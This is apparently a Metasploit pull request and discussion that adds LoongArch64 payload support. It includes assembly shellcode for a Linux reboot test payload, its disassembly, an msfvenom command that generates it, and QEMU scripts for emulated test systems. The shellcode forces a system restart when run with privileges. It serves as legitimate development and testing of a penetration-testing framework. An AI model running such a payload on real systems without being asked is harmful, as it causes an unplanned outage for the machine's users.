Add support for LoongArch64 payloads

[bcoles]

Add support for LoongArch64 payloads. Includes Linux Reboot payload for testing.

Tested on:

• QEMU 10.0.50
• Alpine Standard 3.21.0
• Loong Arch Linux 2023.12.13

Note:

• We don't handle syscall failure or call exit. This saves a few bytes.
• Executing the Linux Reboot payloads as a low privileged user will crash. reboot is a privileged syscall.
• For elf-so, I gave up trying to make a working shared object that plays nicely with the LoongArch dynamic loader. Getting this to work may require modifying our ELF patching code in Msf::Util::EXE.to_exe_elf to patch DT_INIT - which is significant scope creep for this PR. Instead I took the lazy option: the LoongArch SO template is almost identical to our aarch64 and riscv64le templates, and the generated elf-so file will work when executed directly (./payload.so) but will fail when loaded with LD_PRELOAD.

Motivation

This PR lays the foundation for further development of LoongArch payloads.

AI summary:

LoongArch is a new 64-bit Reduced Instruction Set Computer (RISC) instruction set architecture (ISA) introduced by Loongson Technology in 2020, developed based on the company's two decades of experience in CPU development and ecosystem construction. It is designed to be independent of foreign architectures like x86, ARM, and RISC-V, aiming to establish a self-sufficient industrial ecosystem in China, particularly in response to trade sanctions and dependency on foreign intellectual property. LoongArch is not binary compatible with MIPS or RISC-V, although it shows architectural influence from both. The ISA consists of a compulsory infrastructure and optional extensions, including vector instructions, virtualization, and binary translation, incorporating nearly 2,000 instructions.

The Linux kernel has supported LoongArch since 2022. gcc and musl already support compiling for LoongArch.

The list of popular Linux distros supporting LoongArch is growing, with Debian, Gentoo, Slackware, and Fedora offering experimental builds, and Alpine offering official support. See also: Are We Loong Yet?

LoongArch based development boards / SBCs and consumer-grade laptops are slowly entering the market.

The changes introduced in this PR wire up msfvenom and Metasploit interfaces to support LoongArch, with a simple test payload and spec test, which should greatly assist with subsequent development.

Verification

Linux Reboot Payload

Generate a Linux Reboot payload (with optional 100 byte NOP sled):

• ./msfvenom -n 100 --format elf -p linux/loongarch64/reboot > reboot.elf

Execute the payload with QEMU (I suggest doing this within an emulated Linux environment):

• /home/user/qemu/build/qemu-loongarch64 -strace ./reboot
• Note reboot fails as a low privileged user
• Save your work. You are about to reboot your system.
• sudo /home/user/qemu/build/qemu-loongarch64 -strace ./reboot
• Note the system reboots

Source:

$ cat reboot.s
# LoongArch64 reboot shellcode
# ---
# bcoles

.global _start
.section .text

_start:
  li.d $a0, 0xfee1dead   # magic1
  li.d $a1, 0x28121969   # magic2
  li.d $a2, 0x01234567   # LINUX_REBOOT_CMD_RESTART
  li.w $a7, 142          # reboot
  syscall 0x0101

$ cat build
#!/bin/sh
PATH="/home/user/Desktop/musl-cross/loongarch64-unknown-linux-musl/bin/:$PATH"
loongarch64-unknown-linux-musl-as reboot.s -o reboot.o && \
loongarch64-unknown-linux-musl-ld -O2 reboot.o -o reboot --nostdlib --static && \
loongarch64-unknown-linux-musl-objdump -d reboot

$ /home/user/Desktop/musl-cross/loongarch64-unknown-linux-musl/bin/loongarch64-unknown-linux-musl-objdump -d reboot

reboot:     file format elf64-loongarch


Disassembly of section .text:

0000000120000078 <_start>:
   120000078:	15fdc3a4 	lu12i.w     	$a0, -4579
   12000007c:	03bab484 	ori         	$a0, $a0, 0xead
   120000080:	16000004 	lu32i.d     	$a0, 0
   120000084:	14502425 	lu12i.w     	$a1, 164129
   120000088:	03a5a4a5 	ori         	$a1, $a1, 0x969
   12000008c:	14024686 	lu12i.w     	$a2, 4660
   120000090:	03959cc6 	ori         	$a2, $a2, 0x567
   120000094:	0382380b 	li.w        	$a7, 0x8e
   120000098:	002b0101 	syscall     	0x101

Hardware

I don't have real hardware, but QEMU should be sufficient. I'm not sure your chances of buying LoongArch hardware outside of China, but you could try:

• https://www.aliexpress.com/w/wholesale-loongson.html?spm=a2g0o.productlist.search.0

Emulation

Note that apparently QEMU 7.2.0+ is required:

Note: Target support for LoongArch is fully upstreamed as of 2022-07-23, but QEMU 7.1.0 still contained bugs that effectively prevented linux-user emulation of LoongArch from working, and system emulation mildly suffered as well. QEMU 7.2.0 should be usable out of the box. ~ https://blog.xen0n.name/en/posts/tinkering/loongarch-faq/

A few distros offer LoongArch builds, but I've had mixed results with building them. Below are my recipes for working systems. YYMV - I built these a few years ago.

Loong Arch Linux

$ ls archlinux-minimal-2023.12.13-loong64/
archlinux-minimal-2023.12.13-loong64.qcow2  archlinux-minimal-2023.12.13-loong64.qcow2.zst  QEMU_EFI_7.2.fd  QEMU_EFI_8.0.fd  run

$ cat archlinux-minimal-2023.12.13-loong64/run
#!/bin/sh
# https://loongarchlinux.org/pages/vmrun/
# https://mirrors.pku.edu.cn/loongarch/archlinux/images/
# 管理员名称：root
# 管理员密码：loongarch
# 用户名称：loongarch
# 用户密码：loongarch

/home/user/qemu/build/qemu-system-loongarch64 \
    -serial mon:stdio \
    -m 2G \
    -cpu la464-loongarch-cpu \
    -machine virt \
    -smp 2 \
    -bios QEMU_EFI_8.0.fd \
    -device virtio-gpu-pci \
    -net nic \
    -net user \
    -device nec-usb-xhci,id=xhci,addr=0x1b \
    -device usb-tablet,id=tablet,bus=xhci.0,port=1 \
    -device usb-kbd,id=keyboard,bus=xhci.0,port=2 \
    -hda archlinux-minimal-2023.12.13-loong64.qcow2 \
    -no-reboot

#-net user,hostfwd=tcp::5022-:22 \
#-net tap,ifname=vnet0,script=no,downscript=no \

Alpine Linux

$ ls alpine-standard-3.21.0-loongarch64
alpine.img  QEMU_EFI_8.0.fd  run

$ cat alpine-standard-3.21.0-loongarch64/run 
#!/bin/sh
# qemu-img create -f qcow2 alpine.img +20G
# https://wiki.alpinelinux.org/wiki/Loongarch64

/home/user/qemu/build/qemu-system-loongarch64 \
    -nographic \
    -m 2G \
    -cpu la464-loongarch-cpu \
    -machine virt \
    -smp 2 \
    -bios QEMU_EFI_8.0.fd \
    -device virtio-gpu-pci \
    -hda alpine.img \
    -net nic \
    -net user \
    -no-reboot


    #-boot d -cdrom alpine-standard-3.21.0-loongarch64.iso \

    #-net user,hostfwd=tcp::5022-:22 \
    #-net tap,ifname=vnet0,script=no,downscript=no \

Use the commented -drive line at the bottom to boot from ISO to complete the install process. Then comment the line again to boot the installed system.

You may (or may not) need the u-boot-qemu and opensbi packages (apt install u-boot-qemu opensbi).

References

• https://loongson.github.io/LoongArch-Documentation/LoongArch-Vol1-EN.html
• https://blog.xen0n.name/en/posts/tinkering/loongarch-faq/
• https://docs.kernel.org/arch/loongarch/introduction.html

[dledda-r7]

@bcoles Thanks for your contribution, Do you think is worth considering adding it to mettle? We have couple of architecture I want us to get rid of because they are unused (ARMBE for example) and PPC because is broken so this should give us a space to throw in new arch, I was already thinking about RISC-V and maybe this one. I've seen this BPI-2K0300 Zhongke Loongson 2K0300 Embedded Single-board CPU 1.0GHz DDR4 Computer is like ~40 euro and may be a good addition to our lab, I should be able to swap it somewhere. also including @bwatters-r7 for visibility since he is our IoT lab guru

[bcoles]

Do you think is worth considering adding it to mettle? We have couple of architecture I want us to get rid of because they are unused (ARMBE for example) and PPC because is broken so this should give us a space to throw in new arch, I was already thinking about RISC-V and maybe this one.

Support for RISC-V is worth adding to mettle.

Whether support for LoongArch would be useful remains to be seen. Loongson have had several attempts at using and extending MIPS prior to the development of their own ISA. LoongArch is gaining popularity and has political backing. It seems likely to me that LoongArch will be more popular than its MIPS-based predecessors and ultimately replace them in China, but whether LoongArch will ever see widespread adoption outside of China is unclear. There's also the tiny issue of export restrictions which may never be lifted.

I've seen this BPI-2K0300 Zhongke Loongson 2K0300 Embedded Single-board CPU 1.0GHz DDR4 Computer is like ~40 euro and may be a good addition to our lab, I should be able to swap it somewhere.

This looks like a LoongISA chip which is MIPS based. For LoongArch you'll want a Loongson 3A5000+.

[dledda-r7]

Do you think is worth considering adding it to mettle? We have couple of architecture I want us to get rid of because they are unused (ARMBE for example) and PPC because is broken so this should give us a space to throw in new arch, I was already thinking about RISC-V and maybe this one.

Support for RISC-V is worth adding to mettle.

Whether support for LoongArch would be useful remains to be seen. Loongson have had several attempts at using and extending MIPS prior to the development of their own ISA. LoongArch is gaining popularity and has political backing. It seems likely to me that LoongArch will be more popular than its MIPS-based predecessors and ultimately replace them in China, but whether LoongArch will ever see widespread adoption outside of China is unclear. There's also the tiny issue of export restrictions which may never be lifted.

I've seen this BPI-2K0300 Zhongke Loongson 2K0300 Embedded Single-board CPU 1.0GHz DDR4 Computer is like ~40 euro and may be a good addition to our lab, I should be able to swap it somewhere.

This looks like a LoongISA chip which is MIPS based. For LoongArch you'll want a Loongson 3A5000+.

Ok thanks a lot @bcoles for sharing your thoughts, I'll go ahead and test this PR. Cheers!